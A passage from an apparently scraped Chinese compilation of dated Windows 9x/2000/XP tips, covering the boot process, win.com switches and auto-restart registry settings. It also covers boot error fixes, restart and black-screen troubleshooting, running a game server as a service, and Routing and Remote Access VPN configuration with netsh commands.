(如WIN 9X、LINUX、UNIX、OS/2等)无关)，完成自检过程

    ⑵读入硬盘的主引导记录、分区引导记录，自动加载IO.SYS

    ⑶IO.SYS读取MSDOS.SYS配置，确定启动方式，根据CONFIG.SYS，进行硬件配置

    ⑷IO.SYS根据WIN 9X启动要求，自动加载必要的默认驱动程序(HIMEM.SYS、SETVER.EXE，
IFSHLP.SYS等)

    ⑸IO.SYS调入COMMAND.COM，解释执行AUTOEXEC.BAT，进行软件配置

⑹IO.SYS进行必要的默认环境设置

    ⑺自动执行WIN.COM，进入GUI启动阶段

    ⑻执行WININIT.EXE，对系统驱动程序进行升级

    ⑼加载SYSTEM.INI中[BOOT]、[386ENH]、[DEVICES]等节设置的驱动程序

    ⑽根据SYSTEM.INI、WIN.INI和系统注册表进行系统组合、配置，各类启动时调用的VXD文
件主要存放在C:\WINDOWS\SYSTEM下的VMM32和IOSUBSYS下

    ⑾加载SYSTEM.INI中的“SHELL=”指定的外壳程序

    ⑿执行系统注册表中的HKEY_LOCAL_MACHINE→Software→Microsoft→Windows→Current
Version下的Run、RunOnce中包含的应用程序(其中RUNONCE包含的程序只运行一次后就被自动
删除，该键主要用于软件安装)，通常默认加载Internat.exe(输入法)、Systray.exe(音量控
制)和WIN 98的ScanRegw.exe/autorun。

    ⒀当用户完成身份登录后，系统执行HKEY_CURRENT_USER→Software→Microsoft→Windo
ws→CurrentVersion下的Run、RunOnce中包含的应用程序

    ⒁执行WIN.INI中的LOAD= RUN=加载的应用程序

    ⒂执行开始菜单中［启动］组包含的应用程序

    十、结语

    WIN 9X的启动过程终于介绍完了。由于笔者知识水平和眼界的局限，其中还是留下了许多
空白就教于诸位高手。

    诚然，这个过程本来是一个相当陈旧的话题，但是多数介绍仅限于局部技巧，且谬传颇多
，比较系统完整的非常少见，这给广大电脑爱好者带来很大的困惑，这里不自量的献丑，实是
纠正一些流传的误解，使电脑爱好者对WINDOWS 9X的启动过程有一个相对完整清晰的把握。


Windows 9X启动参数揭秘

《一键清理系统垃圾》

Windows 9X启动参数揭秘

    自Windows问世以来，系统的启动就被微软搞得神秘兮兮的，弄得人满头雾水。其实Windows的启动仍是以DOS为基础的，大致过程是：开机后，电脑首先自检，执行BIOS程序，进行初始设置，读取磁盘的引导扇区，把系统控制权交IO.SYS，由IO.SYS读取MSDOS.SYS，装入Himem.sys、Setver.exe等驱动程序，然后执行CONFIG.SYS和AUTOEXEC.BAT文件，完成DOS的引导。接下来，系统装入Windows的驱动程序，最后执行Win.com程序，进入Windows。
    既然Windows最终是以执行Win.com程序而启动的，则在执行Win.com程序时，我们还可以加入一些启动参数，以达到我们特殊的目的。而实际上，Win.com程序也是有启动参数的，这些参数的作用是在Windows不能正常启动时，用以发现和修复系统故障，其命令格式是：
    Win [／D:[F][M][S][V][X]]
    无论欲使用哪一参数启动Windows，参数“／D”是必不可少的，然后才能选择要使用的其他参数。其他参数的作用如下：
    :F关闭32位磁盘访问方式，相当于在SYSTEM.INI中设置“32BitDiskAccess=FALSE”。
    :M　以Safe mode（安全模式）启动Windows。
    :N　以Safe mode（安全模式）启动Windows，只是比“:M”参数多了网络功能。
    :S　禁止Windows使用F000:0000和1MB间的ROM地址当作系统的断点（break point），相当于在SYSTEM.INI中设置“SystemROMBreakPoint=FALSE”。
    :V　指定由BIOS ROM常驻程序处理硬盘控制器传来的中断，相当于在SYSTEM.INI中设置“VirtualHDIRQ=FALSE”。
    :X　禁用Windows扫描到的“非活动”高端内存区域，相当于在SYSTEM.INI中设置“EMMExclude=A000－FFFF”。
    天有不测之风云，你的爱“机”也难免旦夕祸福，万一在你“泡吧”时，爱“机”发生系统故障，或许在调用Win.com程序时，使用这些参数，能帮助你快速发现系统的问题所在，排除电脑故障，解决系统问题呢！而且Win命令还解除了你频频重新启动电脑的麻烦，节约了你的宝贵时间。


Windows XP还可以这样重启

《一键清理系统垃圾》

Windows XP还可以这样重启

    当您的计算机死机、停止响应等，您不得不用“Reset”或“Ctrl+Alt+Del”重新启动来解决问题，如果您觉得这样还很麻烦的话，可以考虑用下面的方法来让计算机自动重启。
  1． 系统死锁时自动重启

    单击“开始→运行”，键入“REGEDIT”并回车，打开注册表编辑器，找到并展开[HKEY_LOCAL_MACHINE\System\CurrentControlSet\CrashControl ]分支，在右侧窗口中找到“AutoReboot”（如果没有，我们可以新建一个）键，将其值修改为“1”。退出注册表编辑器并重新启动一次计算机，以后系统死机时就会自动重启。

    2． “资源管理器”崩溃时自动重启

    我们还可以在“资源管理器”崩溃（桌面图标、任务栏无法显示，鼠标消失，不能使用Alt+Tab组合键切换窗口等等）时，让计算机自动重启。

    打开注册表编辑器，依次展开[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon ]分支，在右侧窗口找到“AutoRestartShell”（如果没有，我们可以新建一个）键，将其值修改为“1”。重新启动计算机设置即生效。


WINDOWS隐藏启动文件位置

《一键清理系统垃圾》

WINDOWS隐藏启动文件位置

C:\WINDOWS\All Users\Start Menu\Programs\启动

在此文件夹下的文件和快捷方式随电脑启动而启动


把mirserver的所有启动文件添加为win2000服务

《一键清理系统垃圾》

把mirserver的所有启动文件添加为win2000服务

经过测试，firedaemon的最新版软件可以正确把mirserver加为服务。

而且，最新版软件增加了“FireDaemon Service Manager”，可以通过窗口界面安装服务、修改服务，非常方便。
下载地址:

http://on165-http.skycn.net:8080/down/firedaemon_0-09c.exe
=============================================================================

1。控制程序的运行级别并加强了程序的稳定性
2。Windows 2000系统启动时自动加载运行mirserver，这样就算服务器出了问题，也不会影响mirserver服务的持
续运行。这与你把mirserver加入启动组所实现的功能是不同的，加入服务是在windows核心模块启动的时候运行，加入
启动组只是在用户确认身份进入系统后才开始执行。通俗一点举个例子：系统重起后，会提示你输入Administrator
密码，如果只是把mirserver加入了启动组，那么这个时候mirserver并没有运行，只有等你输入密码，进入系统后
，mirserver才被执行；而如果把mirserver加入了服务，则这个时候mirserver已经开始运行了。
3。如果系统出了问题，导致mirserver关闭，则服务模式能够在mirserver关闭后马上重新启动它。等于雇了一个奶
妈时时刻刻守候着mirserver，爽吧！：）

既然加入服务对mirserver有这么多好处，那就用第三方软件Firedaemon把它加入系统服务好了，具体方法如下：
1。下载Firedaemon
2。安装Firedaemon
3。卸载Firedaemon
4。操作完毕

哈哈，别打我，刚才只是热热身，现在才开始真正的操作：
1。下载Firedaemon
2。安装Firedaemon
3。卸载。。靠！惯性，对不住呀。这一步应该是执行程序组里面Firedaemon的主程序，按照它的提示进行服务的添加，
每个步骤完成后按回车键（Enter键）确认。
第一步：提示你输入服务的名字，请注意用英文，而且不要有空格符，建议输入：M2Server
第二步：让你输入路径，如果你的M2Server.exe放在D盘的\mirserver\Mir200目录，则输入：d:\mirserver\Mir200
第三步：让你输入执行程序路径，如果你的M2Server.exe放在D盘的\mirserver\Mir200目录，则输入：d:\mirserver\MIR200\M2Server.exe
第四步：提示你输入执行参数。由于M2Server.exe不需要参数，这一步直接回车（按Enter键）就可以了
第五步：是否在程序关闭的时候是否自动重起，当然输入y了
第六步：Affinity Mask，意思是让你输入程序跟系统的紧密程度，这个选项只对多CPU的服务器有效。如果你的服务
器只有一个CPU，输入0就可以了。
第七步：输入程序的运行级别。由于MIRSERVER不需要太高的运行级别就可以稳定运行，设置为普通就可以了，输入0
第八步：是否与桌面交互。输入y
第九步：是否在系统重起的时候自动启动本服务。输入y
第十步：其它的文启动文件按上面所讲的进行加入就可以了！！！这里不再重复！！

4。操作完毕，这个时候你可以在[开始]-->[程序]-->[管理工具]-->[服务]中看到你设置好的M2Server服务了。


不重启电脑更改IP地址

《一键清理系统垃圾》

不重启电脑更改IP地址

《中国电脑教育报》耿世锋

    笔者在一个很偶然的机会下发现，原来在Windows 98系统中更改IP地址后也有办法不重新启动电脑就让新IP地址生效。

    首先在更改系统的IP地址后选择不重启电脑并打开“控制面板”，选择“系统”打开“系统 属性”对话框（也可以直接右击“我的电脑”在弹出菜单中选择“属性”项），进入“设备管理器”选项卡后单击“网络适配卡”前面的“+”，选择相应的网卡并打开它的属性窗口。把“设备的用法”里的“在此硬件配置文件中禁用(D)”前的复选框选中，然后点击“确定”按钮，不久后系统就禁用了这个网卡设备了。接下来再用同样的方法重新启用这个被禁用的网卡设备并点击“确定”按钮，这时网卡设备又被重新启用了，同时新更改的IP地址也生效了而且不用重启电脑了。

    通过刚才禁用和启用网卡设备使该网卡设备得到重新驱动和刷新，所以更改新的IP地址也就生效了。


常见开机引导错误详解

《一键清理系统垃圾》

常见开机引导错误详解

主机开机后，系统开始自动引导启动，但由于一些错误，引导可能中断，并提示错误信息。我们以常见的故障为例，进行讲解。
   情况一：屏幕提示“HDD controller failue” 硬盘控制器故障。这通常试由于硬盘与硬盘控制器的信号通讯电路不好造成的，应关闭电源，检查与硬盘有关的电缆连接是否完好。
   情况二：屏幕显示“Bad or missing command interpreter”表明C盘下的command.com文件损坏或已被删除。可用同版本软盘启动盘启动，然后键入SYS C: 回车，进行恢复。出现这种情况也有可能是感染了病毒，应先进行杀毒。
   情况三：在用软盘启动盘启动时显示“Diskette Boot Failue”软盘引导失败。这一般时因为启动盘损坏，只需更换启动盘即可。
   情况四：硬盘启动时屏幕显示“Disk　Boot Failure”。此时用软盘启动盘重新启动后，再试图进入C盘，屏幕显示“Invalid Driver Specification”。这是当BIOS读硬盘引导区信息时发现引导区有错误或已被破坏。出现这种情况一般是由于错误的操作、非法的程序或病毒引起的，需要恢复引导区的程序或分区表。如果你没有对引导区进行备份，那就只能用FDISK命令来从新分区。
   情况五：屏幕显示大写“NO ROM BASIC, SYSTEM HALTED”并且立即死机。这是因为系统启动时BIOS没有再硬盘或软盘上找到引导扇区，只好企图运行ROM BASIC，而现在的兼容机基本上都没有安装ROM BASIC 程序。出现这种情况可能是因为不慎改动了硬盘的分区表或者分区表被病毒所破坏。如果事先没有准备补救盘，就只能运行FDISK命令重新分区。
   情况六：屏幕显示“Invalid Partiton Table”表明DOS分区表错误。可能是由于硬盘分区记录的活动分区标志和分区结束标志丢失造成的，可用Diskedit 将其改正，或者用软盘启动，利用FDISK命令重建DOS分区。
   情况七：屏幕显示“Error Loding Operating System”或者“Missing Operating System”表明硬盘的主引导记录被破坏，或者分区的结束标志遭到破坏，还有可能是由于CMOS重硬盘参数设置错误引起的。可能引起这种现象的原因有：CMOS参数被改动；硬盘下的系统文件IO.SYS和MSDOS.SYS遭到破坏；硬盘DOS引导记录（BOOT）遭到严重破坏，或者DOS引导记录的结束标志丢失；也可能是硬盘的主引导数据被破坏，或主引导结束标志丢失。为了避免更打的损失，我们需要按照一定的步骤来解决：首先，进入CMOS，检查并改正其中的错误参数；如若不成功尝试有SYS　C：将系统文件复原；如若还不成功，可用Diskedit 修改硬盘主引导的结束标志；还未解决的话，就用FDISK命令重新分区。


处理Windows98不能正常启动故障几法

《一键清理系统垃圾》

处理Windows98不能正常启动故障几法

    虽然说Windows 98的稳定性比Windows 95要好一些，但也会遇到蓝屏死机，甚至不能正常启动Windows。这时我们可以分两种情况来处理，一种是能正常启动进入安全模式，另一种是连安全模式都进不了。
    一、如果能进入安全模式
    如果能进入安全模式，问题一般都不大。可以分两种情况来处理：
    1.在安装新设备后不能正常启动，我们可以在启动时按F5键进入安全模式后，到控制面板中双击系统这一项，在系统属性中选择“设备管理器”选项卡，在列出的所有设备中看有没有发生冲突的设备，一般发生冲突的设备前有一个感叹号。如果有的话你可以选择这个设备，然后再选择“属性”，查看所选择设备当前状态。如果在“资源”选项卡下列出了这个设备与其它设备的中断冲突，可以取消“自动设置”复选框，然后单击“更改设置”按钮，选择一个没有使用的中断号即可。更改完后再重新启动系统，看看能不能正常启动。如果还不行，仍然中断冲突，那你可以在设备属性中选择“常规”选项卡，在设备的用法的分组框中，选中“在此硬件配置文件中禁用”复选框，这表示在Windows 98中不使用此设备。如果能正常启动成功，证明这个硬件的驱动程序可能有问题，可以在设备管理器中将它删除后重装驱动程序，一般可以解决此类问题。
    2.故障由启动时自动启动某软件造成的，可以依次选择“开始／运行”菜单，输入“msconfig”，启动系统配置实用程序，选择“启动”选项卡，在窗口中列出了系统启动时自启动的所有应用程序，在有问题的程序前面去掉小勾，就可以实现不启动此程序。去掉后重新启动系统即可解决此类问题。顺便提一句，如果发现一些不知从何而来的自动启动应用程序名，千万要警惕。特别是上了网的朋友，它可能是后门或远程控制程序，一定要禁止它的自启动，然后找到此文件把它删除掉。如果在系统启动时提示丢失了某些在system.ini文件中的.vxd、.386等文件，你可以到其他计算机上拷贝相应的文件到对应的位置，如果还不行，你还可以备份你的Windows 98安装目录下system.ini文件，然后用文本编辑器打开system.ini文件找到相应的.vxd或.386的那一行，将该行删除即可，如果修改有误，再用备份还原即可。
    二、如果不能进入到安全模式
    如果不能进入到安全模式，一般来说Windows 98出现了严重的错误，这时你可以用以下方法试一试。
    首先，用杀毒软件查杀病毒，看是不是病毒造成的。在启动时按下F8键，一般会出现6个选项（如果安装了DOS6.22则出现7个选项）选择第4项step－by－step confirmation进入单步运行方式，接着屏幕会出现Process the system registry [Enter=Y，Esc=N]?选项，如果按下Y，计算机就死机了，那么可以重新启动按F8键，选第4项后，只在Device=c:\windows\himem.sys 这一项上按Y，其余的按N后在DOS提示符下输入Scanreg／fix 修复注册表或者是 scanreg／restore恢复到以前系统自动备份的注册表后，再重新启动即可。在出现Create a startup log file （BOOTTLOG.TXT） [Enter=Y，Esc=N]选择Y建立Bootlog.txt这个文件，可以检查启动过程中各个系统文件装载的情况。如果在装载某一个.vxd文件时死机，可以到其它计算机上复制该.vxd文件拷贝过来，还不行的话，你在启动时按F8后选择第5项Command prompt only 后，用Edit 打开boottlog.txt，在这个文件中如[XXXXXXXX] Load Vxd=vmouse表示装载vxd文件在内存地址XXXXXXXX（XXXXXXXX为表示内存地址的8位16进制数），[XXXXXXXX] LoadSuccess=　vmouse表示装载成功，如果显示的是Loadfailed或者是DEVICEINITFILED，那么一定要注意是什么文件出错了，一般来说，如果是vxd文件，可以到其它计算机上把这个文件复制过来就可以了，如果是DEVICEINITFAILED，可以把驱动程序中相应文件重新复制一个过来即可。比较特殊的不能进入安全模式的情况是，如果是一启动就出现现在可以安全地关闭计算机了，一般是因为Windows的System目录的vmm32.vxd被损坏，可以到其它计算机上重新复制一个过来。
    一启动就出现蓝屏并显示VFAT Devcie Initialization Faild表示Windows目录下的dblbuff.sys和ifshlp.sys有问题，有时用系统盘启动再用SYS　C：传送系统后，有可能启动时不能加载dblbuff.systt和ifshlp.sys这两个文件，那么就要自己在config.sys文件中手工加入如：device=c:\windows\dblbuff.sys和devicehigh=c:\windows\ifshlp.sys即可，如果是这两个文件己损坏，可以到其他计算机上重新复制一个过来即可。
    如果以上办法还是不行，我建议最好还是重新安装一次Windows 98。


电脑重启故障

《一键清理系统垃圾》

电脑重启故障

[size=6]一、软件[/size]
[color=Red]1．病毒破坏[/color]
[color=Blue]自从有了计算机以后不久，计算机病毒也应运而生。当网络成为当今社会的信息大动脉后，病毒的传播更加方便，所以也时不时的干扰和破坏我们的正常工作。比较典型的就是前一段时间对全球计算机造成严重破坏的“冲击波”病毒，发作时还会提示系统将在60秒后自动启动。其实，早在DOS时代就有不少病毒能够自动重启你的计算机。

    对于是否属于病毒破坏，我们可以使用最新版的杀毒软件进行杀毒，一般都会发现病毒存在。当然，还有一种可能是当你上网时被人恶意侵入了你的计算机，并放置了木马程序。这样对方能够从远程控制你计算机的一切活动，当然也包括让你的计算机重新启动。对于有些木马，不容易清除，最好重新安装操作系统。
[/color]
[color=Red]2．系统文件损坏[/color]
[color=Blue]当系统文件被破坏时，如Win2K下的KERNEL32.DLL，Win98 FONTS目录下面的字体等系统运行时基本的文件被破坏，系统在启动时会因此无法完成初始化而强迫重新启动。你可以做个试验，把WIN98目录下的字库“FONTS”改名试一试。当你再次开机时，我们的计算机就会不断的重复启动。对于这种故障，因为无法进入正常的桌面，只能覆盖安装或重新安装。[/color]
[color=Red]3．定时软件或计划任务软件起作用[/color]
[color=Blue]如果你在“计划任务栏”里设置了重新启动或加载某些工作程序时，当定时时刻到来时，计算机也会再次启动。对于这种情况，我们可以打开“启动”项，检查里面有没有自己不熟悉的执行文件或其他定时工作程序，将其屏蔽后再开机检查。当然，我们也可以在“运行”里面直接输入“Msconfig”命令选择启动项。
[/color]

[size=6]二、硬件[/size]
[color=Red]1．市电电压不稳[/color]
[color=Blue]　一般家用计算机的开关电源工作电压范围为170V－240V，当市电电压低于170V时，计算机就会自动重启或关机。因为市电电压的波动我们有时感觉不到，所以就会误认为计算机莫名其妙的自动重启了。[/color]
[color=Orange]解决方法：对于经常性供电不稳的地区，我们可以购置UPS电源或130－260V的宽幅开关电源来保证计算机稳定工作。[/color]
[color=Red]2．插排或电源插座的质量差，接触不良[/color]
[color=Blue]市面上的电源插排多数质量不好，内部的接点都是采用手工焊接，并且常采用酸性助焊剂，这样容易导致在以后的使用中焊点氧化引起断路或者火线和零线之间漏电。因为手工焊接，同时因为采用的磷黄铜片弹性差，用不了多长时间就容易失去弹性，致使与主机或显示器的电源插头接触不良而产生较大的接触电阻，在长时间工作时就会大量发热而导致虚接，这时就会表现为主机重新启动或显示器黑屏闪烁。

    还有一个可能是我们家里使用的墙壁插座，多数墙壁插座的安装都不是使用专业人员，所以插座内部的接线非常的不标准，特别这些插座如果我们经常使用大功率的电暖器时就很容易导致内部发热氧化虚接而形成间歇性的断电，引起计算机重启或显示器眨眼现象。
[/color]
[color=Orange]解决方法：

    1)　不要图省钱而购买价廉不物美的电源排插，购买一些名牌的电源插排，因为其内部都是机器自动安装压接的，没有采用手工焊接。

    2)　对于是否属于墙壁插座内部虚接的问题，我们可以把主机换一个墙壁插座试一试，看是否存在同样的自动重启问题。[/color]
[color=Red]3．计算机电源的功率不足或性能差[/color]
[color=Blue这种情况也比较常见，特别是当我们为自己主机增添了新的设备后，如更换了高档的显卡，增加了刻录机，添加了硬盘后，就很容易出现。当主机全速工作，比如运行大型的3D游戏，进行高速刻录或准备读取光盘，刚刚启动时，双硬盘对拷数据，就可能会因为瞬时电源功率不足而引起电源保护而停止输出，但由于当电源停止输出后，负载减轻，这时电源再次启动。因为保护后的恢复时间很短，所以给我们的表现就是主机自动重启。

    还有一种情况，是主机开关电源性能差，虽然电压是稳定的也在正常允许范围之内，但因为其输出电源中谐波含量过大，也会导致主机经常性的死机或重启。对于这种情况我们使用万用表测试其电压时是正常的，最好更换一台优良的电源进行替换排除。
][/color]

[color=Orange]解决方法：现换高质量大功率计算机电源。[/color]
[color=Red]4．CPU问题[/color]
[color=Blue]CPU内部部分功能电路损坏，二级缓存损坏时，计算机也能启动，甚至还会进入正常的桌面进行正常操作，但当进行某一特殊功能时就会重启或死机，如画表，播放VCD，玩游戏等。[/color][color=Orange]解决办法：试着在CMOS中屏蔽二级缓存（L2）或一级缓存（L1），看主机是否能够正常运行；再不就是直接用好的CPU进行替换排除。如果屏蔽后能够正常运行，还是可以凑合着使用，虽然速度慢些，但必竟省钱了。[/color]

[color=Maroon]计算机出现的问题千奇百怪，但如果我们能够了解计算机的基本工作原理，那我们在排除计算机的软硬件故障时就会得心应手，而不会天天头大了。希望本文能对大家有所帮助，请多多支持。


黑屏故障

《一键清理系统垃圾》

黑屏故障

[color=Red]计算机显示器出现黑屏是用户在使用计算机中经常遇到的问题。由于它的成因较为复杂，有可能涉及到计算机硬件中主板、CPU内存、显示卡、显示器等几大部件，故许多人对其故障出现后该如何解决颇有束手无策之感。下面我将结合自己对显示器黑屏故障处理的一些经验来谈谈对这类故障的分析与处理方法。

     显示器黑屏故障按其故障成因可分为由电脑硬件故障引起的黑屏故障和电脑软件故障引起的黑屏故障两大类。其中电脑硬件故障引起的黑屏故障较为常见，而电脑软件故障引起的黑屏故障不易见，且对初学者而言较显繁琐、较为专业。下面我们就分别对其进行论述。[/color]

[color=Red]一、电脑硬件故障引起的黑屏故障[/color]

[color=Blue]一、电脑主机故障引起的黑屏故障

1、主机电源引起的故障

     主机电源损坏或主机电源质量不好引起的黑屏故障很常见。例如，当添加了一些新设备之后，显示器便出现了黑屏故障，排除了硬件质量及兼容性问题之后电源的质量不好动力不足是故障的主要起因，更换大动率质优电源或使用稳压电源是解决这类故障的最好办法。

2、配件质量引起的故障

     电脑配件质量不佳或损坏，是引起显示器黑屏故障的主要成因。如内存，显示卡，主板、CPU等出现问题肯定可能引起黑屏故障的出现。其故障表现为显示器灯呈橘黄色，此时可用替换法更换下显示卡，内存、CPU，主板等部件试试，这是最简便、快捷的解决办法。

3、配件间的连接质量

     内存，显示卡等与主板间的插接不正确或有松动，灰尘等造成接触不良是引发黑屏故障的主要原因。而且显示卡与显示器连接有问题，或驱动器的数据线接反也可能引发黑屏故障。

4、超频引起的黑屏故障

     过度超频或给不适合于超频的部件进行超频不仅会造成黑屏故障的产生，严重时还会引起配件的损坏。若过度超频或给不适合于超频的部件超频后散热不良或平常使用中因风扇损坏导致无法给CPU散热等等都会造成系统自我保护死机黑屏。

二、显示器自身故障引起的黑屏故障

1、交流电源功率不足

     外部电源功率不足，造成一些老显示器或一些耗电功率大的显示器不能正常启动，是显示器自身故障引起的黑屏故障原因之一。或者外部电源电压不稳定，电压过高过低都可能造成显示器工作不稳定、甚至不工作。

2、电源电路故障

     显示器的开关电路以及其他电路出现故障是引起显示器黑屏故障的主要成因。如保险丝熔断，整流桥开关管被击穿，限流保护电阻烧断等故障导致显示器无法工作。

3、 显像管、行输出电路的损坏

     显像管或行输出电路出现故障也会引发显示器加电无光栅黑屏的故障，也是引起显示器黑屏故障的主要成因。

[B]二、电脑软件故障引起的黑屏故障

   如软件冲突，驱动程序安装不当，BIOS刷新出错，CMOS设置不正确等都可引起黑屏故障。此外，如恶性病毒引起硬件损坏（如CIH）等等都有可能引起显示器黑屏故障的出现。 到这类故障时若能多考虑一下故障的成因，做到解决故障知已知彼事半功倍。

三、显示器黑屏故障解决思路

1、检查主机电源，工作是否正常。首先，通过杳看主机机箱面板电源指示灯是否亮，及电源风扇是否转动来确定主机系统有没有得到电源供应。其次，用万用表检查外部电压是否符合要求，电压过高或过低都可能引起主机电源发生过压或欠压电路的自动停机保护。另外，重点检查电源开关及复位键的质量以及它们与主板上的连线的正确与否都有很重要，因为许多劣质机箱上的电源开关及复位键经常发生使用几次后便损坏，造成整机黑屏无任显示。若电源损坏，则更换电源便可解决。

2、检查显示器电源是否接好。显示器加电时有“嚓”的一声响，且显示器的电源指示灯亮，用户移动到显示器屏幕时有“咝咝”声，手背汗毛竖起。

3、检查显示器信号线与显示卡接触是否良好。若接口处有大量污垢，断针及其它损坏均会导致接触不良，显示器黑屏。

4、检查显示卡与主板接触是否良好。若显示器黑屏且主机内喇叭发出一长二短的蜂鸣声，则表明显示卡与主板间的连接有问题，或显示卡与显示器这间的连接有问题，可重点检查其插槽接触是否良好槽内是否有异物，将显示卡换一个主板插槽进行测试，以此判断是否插槽有问题。

5、检查显示卡是否能正常工作。查看显示卡上的芯片是否能烧焦，开裂的痕迹以及显示卡上的散热风扇是否工作，散热性能是否良好。换一块工作正常的显示卡，用以排除是否为显示卡损坏。

6、检查内存条与主板的接触是否良好，内存条的质量是否过硬。如果计算机启动时黑屏且主机发出连续的蜂鸣声，则多半表明内存条有问题，可重点检查内存和内存槽的安装接触情况，把内存条重新拔插一次，或者更换新的内存条。

7、检查机箱内风扇是否转动。若机箱内散热风扇损坏，则会造成散热不良，严重者会造成CPU及其它部件损坏或电脑自动停机保护，并发出报警声。

8、检查其他的板卡（如声卡、解压卡、视频、捕捉卡）与主板的插槽是否良好以及驱动器信号线连接是否正确。这一点许多人往往容易忽视。一般认为，计算机黑屏是显示器部分出问题，与其他设备无关。实际上，因声卡等设备的安装不正确，导致系统初始化难以完成，特别是硬盘的数据线接口，也容易造成无显示的故障。

9、检查CPU是否超频使用，CPU与主板的接触是否良好，CPU散热风扇是否完好。若超频使用导致黑屏，则把CPU跳回原频率就可以了。若接触不良，则取下CPU须重新安装，并使用质优大功率风扇给CPU散热。

10、检查参数设置。检查CMOS参数设置是否正确，若CMOS参数设置不当而引起黑屏，计算机不启动，则须打开机箱，动手恢复CMOS默认设置。

11、检查是否为病毒引发显示器黑屏。若是因病毒造成显示器黑屏，此时可用最新版杀毒软件进行处理，有时需重写BIOS程序。

12、若是显示器内部电路故障导致黑屏或显像管损坏，则应请专业人员维修。


为什么有的机器无法启动"路由与远程访问"服务?

《一键清理系统垃圾》

为什么有的机器无法启动"路由与远程访问"服务?

答: 这可能与你启动了"Internet连接共享"(Internet Connection Sharing)
服务有关,你可以用net stop sharedaccess来停止"Internet连接共享"服务,
然后启动"路由与远程访问"服务.

问题二: 为什么启动"路由和远程访问"服务后在网络邻居"属性"看不到"传入
的连接"呢?或者出现这样的情形,"路由和远程访问"服务已经启动,但是在网
络邻居"属性"看不到"传入的连接".

答: 这是可能是你曾经配置过"网络路由器"的原因,由两种方法可以改正之:
方法一: 通过rrasmgmt.msc
1.启动"远程注册表服务"(net start remoteregistry),停止"路由和远程访
问"服务(net stop remoteaccess);

2.运行rrasmgmt.msc,如果右键出现的是"禁止路由和远程访问",那么你先"禁
止路由和远程访问",然后关闭rrasmgmt.msc.否则直接进入第三步;

3.运行rrasmgmt.msc,然后选择"配置并启用路由和远程访问",然后按下一步,
选择"手动配置服务器",按一下步,然后选择"完成"结束安装;

4.这时候你打开网络邻居会看到"传入的连接"又出现了;

5.此时你运行rrasmgmt.msc,可以再次右键选择"禁用路由和远程访问",然后
关闭rrasmgmt.msc.因为"手动配置服务器"打开了太多的服务.

7.然后你可以启动"路由和远程访问"服务,网络邻居属性里那个"传入的连接"
又出现了.

方法二:运行regedit,打开
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteAccess\
Parameters把右窗口的DWORD值"RouterType"从2改成7(实际上只要不是2,其
他任意整数均可).

问题三: 能不能通过命令行方式配置VPN服务器?

答:可以通过netsh.exe来实现:
netsh ras set user administrator permit #允许administrator拨入该VPN
netsh ras set user administrator deny #禁止administrator拨入该VPN
netsh ras show user #查看哪些用户可以拨入VPN
netsh ras ip show config #查看VPN分配IP的方式
netsh ras ip set addrassign method = pool #使用地址池的方式分配IP
netsh ras ip add range from = 192.168.3.1 to = 192.168.3.254 #地址池
的范围是从192.168.3.1到192.168.3.254

问题四: 一般情况下只有通过rrasmgmt.msc才能对VPN客户端连接数(默认情
况下PPTP和L2TP各5个,直接并行端口1个),与连接方式(PPTP或是L2tp)进行修
改.上文中将rrasmgmt.msc禁用了,是否有其他办法修改端口呢?

答: 有的,方法如下:
1.运行regedit,打开
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet\Control\Class\{4D36E972--E325-
11CE-BFC1-08002BE10318}\0000,0001,0002...
找到右窗口"DriverDesc"为"WAN 微型端口 (PPTP)"和"WAN 微型端口 (L2TP)"
的目录

2.察看右窗口是否有DWORD值"WanEndpoints",如果有,则对之进行修改，
如果没有,则新建一DWORD值"WanEndpoints",其大小为你要设定的连接数

3.重新启动机器.

经过研究,发现对于Win2k Srv或Win2k AdvSrv来说,通过注册表可以修改服务
器接受的连接数,对于Win2k Pro来说,最多只能接受一个Client的连接,但是
修改可以使之不接受Client的连接.

问题五: 开了VPN服务后,有时日志里会有这么一项:
事件类型: 警告
事件来源: RemoteAccess
事件种类: 无
事件 ID: 20192
日期:　2002-8-2
事件:　8:55:12
用户:　N/A
计算机: COMPUTER
描述:
找不到证书。使用在IPSec上的L2TP协议的连接要求安装机器证书,这也叫做计
算机证书.将不会接受L2TP呼叫.

这是怎么回事,怎么才能解决这个问题呢?

答:这是因为Windows为L2TP连接的VPN自动创建一个IPsec策略,这个IPsec策略
使用本地机器上的证书来进行双方的认证.如果本地机器没有合适的证书,那么
就会出现上面的问题.有两种办法可以解决之:
方法一:取消L2TP VPN自动创建的IPsec策略
运行regedit.exe,打开
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Rasman\Parameters
新建一DWORD值ProhibitIPsec,并将值设置为1

方法二,取消L2TP方式的VPN
运行regedit.exe,打开
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet\Control\Class\{4D36E972--E325-
11CE-BFC1-08002BE10318}\0000,0001,0002...
找到右窗口"DriverDesc"为"WAN 微型端口 (L2TP)"
把DWORD值"WanEndpoints"改为0即可

问题六: 怎么做一个认证方式为预共享密钥的L2TP/IPsec方式的VPN?

答:可以参照如下步骤
步骤一:.首先,打开L2TP端口
一般情况下用Win2k Server通过常规方式搭建的VPN服务器对客户端连接情
况是PPTP和L2TP各5个,直接并行端口1个.可通过如下方式修改支持的使用
L2TP的VPN客户端的个数.

运行regedit,打开
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet\Control\Class\{4D36E972--E325-
11CE-BFC1-08002BE10318}\0000,0001,0002...

找到右窗口"DriverDesc"为"WAN 微型端口 (L2TP)"的目录.
察看右窗口是否有DWORD值"WanEndpoints",如果有,则对之进行修改，
如果没有,则新建一DWORD值"WanEndpoints",其大小为你要设定的连接数

2.取消L2TP VPN自动创建的使用证书方式认证IPsec策略
运行regedit.exe,打开
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Rasman\Parameters
新建一DWORD值ProhibitIPsec,并将值设置为1

3.设置IPsec策略保护L2TP通讯,保护内容为本机1701端口到其他任何机器1701端口
的所有UDP通讯.如果安装了Win2000 Resource Kit,使用如下命令:
ipsecpol -w reg -p VPN -r VPN -a preshare:"vpn"
-x -n ESP[3DES,SHA]3600S/100000KP ESP[3DES,MD5]3600S/100000KP ESP[DES,
SHA]3600S/100000KP ESP[DES,MD5]3600S/100000KP
-f 0:1071+*:1071:udp

问题七: PPTP方式和L2TP方式的VPN有何异同?

答:与其协议和工作方式有关

